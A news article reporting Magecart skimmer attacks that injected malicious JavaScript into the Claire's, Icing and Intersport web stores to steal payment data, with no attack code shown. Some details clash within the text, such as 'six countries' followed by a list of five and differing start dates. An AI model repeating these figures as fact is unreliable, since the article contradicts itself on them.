Magecart group hacked Claire’s and Icing websites to steal credentials

Web skimmers have been found leaking customers credentials and credit cards on Claire's and Icing websites

MageCart group attacked three online shops hosted by Salesforce during the Coronavirus pandemic

Clair's – an American retailer of accessories, jewelry, toys, and other products aimed at teen and tween girls has been attacked by an infamous hacking group dubbed as MageCart^[1]. According to the security researchers from Sansec^[2], the retail giant that has 3,469 stores in 37 countries and billions of buyers all across the globe has been hacked on April 20 by the mentioned persistent stealing group that has been leaking customer's payment information from the official retailer's website for nearly two months.

According to the researchers from the Sansec Security report, the MageCart attack took the start at the end of April when the Clair's closed down over 3,000 stores due to the worldwide COVID-19 pandemic^[3]. The skimmers injected the malicious JavaScript scripts into the diverse sections of Clair's website and harvest credit card details, names, and other confidential information about the visitors of the store who made the purchase up until June 13.

The subsidiary Icing web store has also experienced Magecart attack

The data has been skimmed for nearly two months. Having in mind that the previous two months have been announced a quarantine period in many countries all across the world resulting in a significant increase in online sales, the numbers of skimmed credentials can be outstanding.

The actual damage will be revealed upon the investigation. However, cybersecurity experts revealed that Clair's website hasn't been the only one attacked by the MageCart gang. The subsidiary site Icing. Both domains have been compromised by injection malicious JavaScript codes, which allowed scammers to read the information that the visitors of the two online shops enter during the checkout and send it to the claires-assets.com server.

According to the Sanguine Security's Willem de Groot, the suspicious behavior has been noticed on March 20th, the next day after the closeup of the physical Clair's stores. The unrecognized third-party registered a domain CLAIRES-ASSETS.COM. Four weeks later, the researchers found a malicious code added to the app.min.js file, which is normally a legitimate file hosted on the servers of these stores.

Clair's was quick to respond to the issue and took immediate action to remove the malicious code from its domains. The company's spokesperson replied to the Sanguine security team:

Claire’s cares about protecting its customers’ data. On Friday, we identified an issue related to our e-commerce platform and took immediate action to investigate and address it. Our investigation identified the unauthorized insertion of code to our e-commerce platform designed to obtain payment card data entered by customers during the checkout process. We removed that code and have taken additional measures to reinforce the security of our platform.

ESET found a skimmer on several Intersport websites

The security firm ESET has confirmed yet another skimming attack by the MageCart scammers impacting some of the Intersport websites^[4]. This retailer is known as one of the biggest retailers providing sport-related products, clothes, and equipment.

The close analysis has revealed that only customers in 6 countries out of 40 are at risk of having exposed their credit card details and other PII while making the purchases. These countries are the following: Croatia, Serbia, Slovenia, Montenegro, and Bosnia and Herzegovina.

MageCart attack over the mentioned Intersport websites has been revealed on April 30. The security experts of the company eliminated the malicious Javascript codes, though hackers re-attacked these domains on May 14. It seems that all the street stores (Clair's, Icing, and Intersport) are hosted on the Salesforce Commerce Cloud, the eCommerce platform that is known for providing the services to many online stores all over the world. Identical attacks have previously been initiated in the UK online shop known as Sweaty Betty and Hanna Andersson, thus experts are actively working on identifying the causes and clarify if the Salesforce isn't guilty of the poorly protected domains.

However, it's a fact that scammers are forensic as they have predicted a huge increase in online shopping during the pandemic^[5]. This is why the malicious codes have been injected at the same time when countries have started announcing the quarantine one-by-one.

People who have been making purchases on the listed online stores during the period from March 20 until June 13 should take precautionary measures to prevent unauthorized transactions from the bank accounts.